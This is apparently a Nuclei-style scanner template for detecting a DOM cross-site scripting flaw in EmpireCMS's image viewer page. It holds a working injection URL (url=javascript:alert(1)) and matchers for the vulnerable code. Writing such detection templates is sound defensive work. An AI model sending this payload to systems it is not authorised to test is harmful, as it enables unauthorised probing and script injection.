id: CNVD-2021-15824

info:
  name: EmpireCMS DOM Cross Site-Scripting
  author: daffainfo
  severity: medium
  reference:
    - https://www.bilibili.com/read/cv10441910
    - https://vul.wangan.com/a/CNVD-2021-15824
  tags: empirecms,cnvd,cnvd2021,xss,domxss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'if(Request("url")!=0)'
          - 'href=\""+Request("url")+"\"'
        condition: and

      - type: status
        status:
          - 200
